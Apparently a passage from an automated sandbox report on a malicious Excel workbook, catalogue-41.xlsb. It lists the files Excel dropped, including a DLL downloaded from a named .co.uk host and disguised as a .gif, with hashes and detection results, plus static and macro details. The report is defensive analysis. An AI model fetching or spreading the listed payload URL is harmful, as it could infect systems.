                                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-06T16:43:08">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\49C50AD3.png
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):557
                                                                                                                                                                                    Entropy (8bit):7.343009301479381
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                                                    MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                                                    SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                                                    SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                                                    SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4FEC9EB8.png
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):848
                                                                                                                                                                                    Entropy (8bit):7.595467031611744
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                                                    MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                                                    SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                                                    SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                                                    SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5419839A.png
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8301
                                                                                                                                                                                    Entropy (8bit):7.970711494690041
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                                                    MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                                                    SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                                                    SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                                                    SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D6395F59.png
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:PNG image data, 240 x 52, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):7197
                                                                                                                                                                                    Entropy (8bit):7.964447218948388
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:DTUaFds32VHjg5vCBadV58kJ+hX5Y+BXj:D4csOjg5qBadV5n0HY+Vj
                                                                                                                                                                                    MD5:D4E702617A12082888A2FD8BB0A2A8AC
                                                                                                                                                                                    SHA1:7F3A85C42B1B6814E3F32AD579BE8DF4CFF825B3
                                                                                                                                                                                    SHA-256:94102F2D952184B98AF8F0459D6B98AE55CD9D1F445F0EA15A4163A6ED3E3579
                                                                                                                                                                                    SHA-512:DE6C3865F994D8A4332CD7F1CE8398FBE37F17E7B7EB650E271D60A832AC1B3FA98C96EDDB6CE6E353876FE7976C4C8FC64E6D724ADB22971F8D3E2290B35942
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview: .PNG........IHDR.......4......,.0....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^..|.......IH!..@...D.S.....I.......H.....>....]....(W.H..{.....-..}S....9..f.l .3:.|.;.3g...;..&...a....F...F.........4.\or7..3N..{..yt....A.....h..#g,$.....|&.....Ka....YPh.O.\::..............,...[y;~....t.....N0j.:::U.].ut.0....Tat........S...XG.!...I........3...M........=...8..W.".F.....k.....K...........S...I&..rsM".G....t.CJ.P.db..Hy.7..u....J?K3.?C..j.meRH..wh\.]T..Qm[.8..,.=z.\\.~.F.L..].u....j[.}{.........n}A~....K...m)b.O.h......N~...W/z...:U......_@.nn...C...g..........A.d....X#..u.c'..e.e.k7m....>...`.5...8P.<;w..i{.....w..h....*....-....h{.....MK...<<=....^X.{.....I..l+.........7.......I!5j.}.)5%U....0f...o..`..p..,b..M...D....=<$.......:.v6n.H).....8=-........4`..j.).]\.wk...(>..........n,<.q.t...m...j......h`G.]..t|X...........Id..V.'~.X222.M.v..S....o.~4...P..}..XbX.....;....-Y...1...]...7.c...k[*..w..;le=*$.=z>..
                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\suspendedpage[1].htm
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7624
                                                                                                                                                                                    Entropy (8bit):5.642596381720329
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJf0:QJvVGaRF8I80
                                                                                                                                                                                    MD5:190F2D4BCDE1E366EAAB903C29C7A699
                                                                                                                                                                                    SHA1:346D44A0619C97AA226EF52F146F9A133F4DCAAF
                                                                                                                                                                                    SHA-256:20C2D643754869BA5763DDC6289A0FADBBF2DE81236F1F80B7FA3588B14F6EBB
                                                                                                                                                                                    SHA-512:AB3C39F0B6A07F798E9546FA882BE0D850F88337DFBFBF7A797A67B43CC1EA8718C842619E4FE169FD3A6FE270C39866F6B4DBB0187612B2840A6474D0E26BB6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    IE Cache URL:https://ponchokhana.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                                                    Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gif
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):126851
                                                                                                                                                                                    Entropy (8bit):5.838905542589145
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
                                                                                                                                                                                    MD5:0C80AE647DAF723A60A95D917F5B1941
                                                                                                                                                                                    SHA1:9B5D623F314D2719D8CAF70AF33F6DA97A26F304
                                                                                                                                                                                    SHA-256:44855E94F0FE2708B794604F3314C24CE9A7A4043AC3F3A3582A3C0F99C37E8A
                                                                                                                                                                                    SHA-512:E2D3A6D453932BF0A0DDDE6454C03F52707717205246725DE02C0308DF19147905FE7CB612A52AE34976A5233DFC6572818D49BD956235BC4EF6185FD364DF6E
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    IE Cache URL:https://thefamouscurrybazaar.co.uk/ds/0504.ocx
                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko..................................................................................d............................................................................................................................code.............................. ..`.data...d...........................@..@.data...............................@....rdata... .......".......................data...............................@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\0A910000
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):87970
                                                                                                                                                                                    Entropy (8bit):7.883894295344782
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:mAOS/YubKteg7acz0YqAyfzZDSU7RbA8oxd7caCQQVnJot:mAOq/ny0YgVDHbA8oxOkyJU
                                                                                                                                                                                    MD5:4BCC3F1C8F362F2B7940AA333DCC6480
                                                                                                                                                                                    SHA1:B299883445AF613832178E3E876DE7BB3D4439C0
                                                                                                                                                                                    SHA-256:F2F02D94C79A227DB6995BF9FA73F3E5E891D20A5ACC68367765AF8095D34307
                                                                                                                                                                                    SHA-512:DCD400D523768FCA694BD32C0A08FD581B89E72A72F68C17B4019D0C6B4F8F36E3A7468141B26FB34409BD828755416B2D3719E6F360F41ABB028BA688463CDF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: .UMO.0......|E....Z5.....`..kO.....@..w....*MK..|...qf..+k.W.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".klx.r)........%p.L...?a!^L*nW..Q2..7..2U.D.FK.H(.u..I...-Ay.b....A(l..5U......D.!.[9.k>pj.5.......&.......lu.s2......}...0j....^Xr.....q9.~Y...fZ,a%.T.c..2.['..hOh..p.S....].A..!.]..I.<.............?(_..<.....z..a...'..w........im.O|.6.c...............x..x.p..=....F...Nl.......c..i^D8\.{...e .I..l.........C.f...n.M..o.......PK..........!....M....~.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\Users\user\Desktop\~$catalogue-41.xlsb
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                    C:\Users\user\fikftkm.thj1
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):126851
                                                                                                                                                                                    Entropy (8bit):5.838905542589145
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
                                                                                                                                                                                    MD5:0C80AE647DAF723A60A95D917F5B1941
                                                                                                                                                                                    SHA1:9B5D623F314D2719D8CAF70AF33F6DA97A26F304
                                                                                                                                                                                    SHA-256:44855E94F0FE2708B794604F3314C24CE9A7A4043AC3F3A3582A3C0F99C37E8A
                                                                                                                                                                                    SHA-512:E2D3A6D453932BF0A0DDDE6454C03F52707717205246725DE02C0308DF19147905FE7CB612A52AE34976A5233DFC6572818D49BD956235BC4EF6185FD364DF6E
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko..................................................................................d............................................................................................................................code.............................. ..`.data...d...........................@..@.data...............................@....rdata... .......".......................data...............................@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\Users\user\fikftkm.thj3
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):7624
                                                                                                                                                                                    Entropy (8bit):5.642596381720329
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJf0:QJvVGaRF8I80
                                                                                                                                                                                    MD5:190F2D4BCDE1E366EAAB903C29C7A699
                                                                                                                                                                                    SHA1:346D44A0619C97AA226EF52F146F9A133F4DCAAF
                                                                                                                                                                                    SHA-256:20C2D643754869BA5763DDC6289A0FADBBF2DE81236F1F80B7FA3588B14F6EBB
                                                                                                                                                                                    SHA-512:AB3C39F0B6A07F798E9546FA882BE0D850F88337DFBFBF7A797A67B43CC1EA8718C842619E4FE169FD3A6FE270C39866F6B4DBB0187612B2840A6474D0E26BB6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

                                                                                                                                                                                    Static File Info

                                                                                                                                                                                    General

                                                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                                                    Entropy (8bit):7.867603258123718
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                                                    • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                                                    File name:catalogue-41.xlsb
                                                                                                                                                                                    File size:74622
                                                                                                                                                                                    MD5:3ab9cf4d043027eae77763f1addd41af
                                                                                                                                                                                    SHA1:753abe817ad3a4b2c5cb71ea139924ac1179e6f1
                                                                                                                                                                                    SHA256:968278e0bd31a649e48f01fa8eac1291d41a5015dfcfed6ad45739a181a50b40
                                                                                                                                                                                    SHA512:b30a7381c92aeeb71bf1a640f0ce76b7b5c365cc04a8907f1516a64bddc8b17eb8f1143b5281b520883f3ece0863fc294f73f6775cb965973f3e87f1e8c5b65e
                                                                                                                                                                                    SSDEEP:1536:ZUwcQTnrmMFOxW9cnGV67h5KSqhbPeB5FSJUfrcz0YW2fR32:QQTnCMFOxW9cGV67h5KSqVPeBHRjy0Y4
                                                                                                                                                                                    File Content Preview:PK..........!...YQ$...;.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                                    File Icon

                                                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                                                    Static OLE Info

                                                                                                                                                                                    General

                                                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                                                    OLE File "catalogue-41.xlsb"

                                                                                                                                                                                    Indicators

                                                                                                                                                                                    Has Summary Info:
                                                                                                                                                                                    Application Name:
                                                                                                                                                                                    Encrypted Document:
                                                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                                                    Flash Objects Count:
                                                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                                                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,